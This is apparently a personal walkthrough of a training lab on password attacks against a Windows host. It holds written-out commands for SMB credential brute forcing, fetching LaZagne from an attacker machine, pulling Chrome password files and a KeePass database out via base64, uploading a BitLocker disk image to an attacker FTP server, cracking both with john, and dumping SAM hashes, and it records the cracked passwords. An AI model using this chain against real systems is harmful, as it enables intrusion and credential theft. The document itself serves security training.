Password Attacks Lab - Hard

June 16, 2024

# Nmap 7.94SVN scan initiated Sun Jun 16 15:00:07 2024 as: nmap -sC -sV -oN nmap -Pn -vv 10.129.130.245
Nmap scan report for 10.129.130.245
Host is up, received user-set (0.29s latency).
Scanned at 2024-06-16 15:00:07 PST for 108s
Not shown: 994 closed tcp ports (conn-refused)
PORT     STATE SERVICE       REASON  VERSION
111/tcp  open  rpcbind       syn-ack 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds? syn-ack
2049/tcp open  status        syn-ack 1 (RPC #100024)
3389/tcp open  ms-wbt-server syn-ack Microsoft Terminal Services
|_ssl-date: 2024-06-16T07:01:50+00:00; +5s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: WINSRV
|   NetBIOS_Domain_Name: WINSRV
|   NetBIOS_Computer_Name: WINSRV
|   DNS_Domain_Name: WINSRV
|   DNS_Computer_Name: WINSRV
|   Product_Version: 10.0.17763
|_  System_Time: 2024-06-16T07:01:41+00:00
| ssl-cert: Subject: commonName=WINSRV
| Issuer: commonName=WINSRV
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-06-15T06:59:35
| Not valid after:  2024-12-15T06:59:35
| MD5:   eceb:7c31:f237:0403:721c:7a4f:2dbb:a514
| SHA-1: 7df6:a481:957d:47d9:b182:d24f:5295:8c30:e26f:9769
| -----BEGIN CERTIFICATE-----
| MIIC0DCCAbigAwIBAgIQSiFnTc+vRL1Oo+PP3CWI0DANBgkqhkiG9w0BAQsFADAR
| MQ8wDQYDVQQDEwZXSU5TUlYwHhcNMjQwNjE1MDY1OTM1WhcNMjQxMjE1MDY1OTM1
| WjARMQ8wDQYDVQQDEwZXSU5TUlYwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
| AoIBAQDd0f4RooI9OBZTAbwuOwaZA6xdUrGl3+P8McHSVUY1yGlk0fVW707f+r1I
| tuqPZxE9cvEhFFkpsA0Vm2iGPJvBkQ1RJr9Boc4xouqkAgtbl5NvsPvvJ4+bqXNG
| v2b6ZDqOG4YcPsnUvUsrwuUp4cVyysItobLshgBb7Qf0AdpJhuhmifreyzVcPKav
| KlkJ8tNBJEIq8sA8J390ux3tSCIxWBjWaWy7zS/dnMotAfVT/obhVoMrZtkmu7ZW
| f1RRIP9olZnA974Af54gtMtHa2NoZ741/SDsseNNACQEkzCqqyT2X8z1g7M7wcEo
| 3CVqs8E444rN0dsQz3BGr8EQYrh9AgMBAAGjJDAiMBMGA1UdJQQMMAoGCCsGAQUF
| BwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsFAAOCAQEARGR0HfptXq8AwkYM
| oaUoZDgzMsCFDSx7HrcVkPKO7Exv5TTW73r90MgjHTqL5WFMf3cPsByH1SBJR3pl
| aq+vGeooP72V7XArtHlSUHKLuf6yutIcmW23wEDcPfUeiBrOS9+XzKC2zH1gNmTn
| 7ZzjWuH2l6U8QpuxdpfjONlpRc3OyxSutg9kPJVsRCrYOxhIicG3iZCDCXzkEnRs
| UsQ6mk4ft/Q43vmV3pIDcS+QOZFQYhJjESOMFWSgARA9HI5oO3PbAnY6jsgkZmkz
| wQwFfvWkYiqjWlbzzH6CkmVhMsp4TghlanNw57fJlizslb8sUkXxtun2y/TvBRze
| hWGcUw==
|_-----END CERTIFICATE-----
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 18946/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 57309/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 63004/udp): CLEAN (Failed to receive data)
|   Check 4 (port 10241/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2024-06-16T07:01:42
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: 4s, deviation: 0s, median: 4s

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 16 15:01:55 2024 -- 1 IP address (1 host up) scanned in 108.21 seconds

msfconsole -q 
use smb_login
set rhost 
run

poetry run crackmapexec smb 10.129.130.245 -u Johanna -p /home/kyou/academy-htb/password-attacks/medium-lab/mut_password.list --local-auth

Johanna:1231234!

xfreerdp /v:10.129.130.245 /u:Johanna /p:1231234!

wget http://10.10.14.251:8000/LaZagne.exe -OutFile lazagne.exe

findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml

more AppData\Local\Google\Chrome\"User Data"\ZxcvbnData\1\passwords.txt

[Convert]::ToBase64String((Get-Content -path "C:\Users\johanna\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\passwords.txt" -Encoding byte))

echo 'The result from above command' | base64 -d > passwords.txt

wc passwords.txt

[Convert]::ToBase64String((Get-Content -path "C:\Users\johanna\Documents\Logins.kdbx" -Encoding byte))

Get-FileHash "C:\Users\johanna\Documents\Logins.kdbx" -Algorithm MD5 | select Hash

md5sum Logins.kdbx
sudo keepass2john Logins.kdbx > forjohn
cat forjohn

sudo john --wordlist=../medium-lab/mut_password.list forjohn

Qwerty7!

david:gRzX7YbeTcDG7

Now i can run cmd as different user

First we setup our ftp server

sudo python3 -m pyftpdlib --port 21 --write

Then just use this command to upload to our ftpserver / attacker machine

(New-Object Net.WebClient).UploadFile('ftp://10.10.14.2/Backup.vhd', 'C:\Users\david\Documents\David\Backup.vhd')

sudo bitlocker2john -i Backup.vhd > backup.hashes

grep "bitlocker\$0" backup.hashes > backup.hash
cat backup.hash

john --wordlist=../medium-lab/mut_password.list backup.hash

123456789!

sudo losetup -fP Backup.vhd
sudo losetup -a

lsblk

sudo dislocker /dev/loop8p2 -u'123456789!' -- /mnt/bitlocker

sudo mount -o loop /mnt/bitlocker/dislocker-file /mnt/bitlocker_mount

impacket-secretsdump -sam SAM -system SYSTEM LOCAL

hash NTLM

Administrator:500:aad3b435b51404eeaad3b435b51404ee:e53d4d912d96874e83429886c7bf22a1:::

Administrator:Liverp00l8!

Then just umount the files

sudo umount /mnt/bitlocker_mount
sudo umount /mnt/bitlocker
sudo rmdir /mnt/bitlocker_mount
sudo rmdir /mnt/bitlocker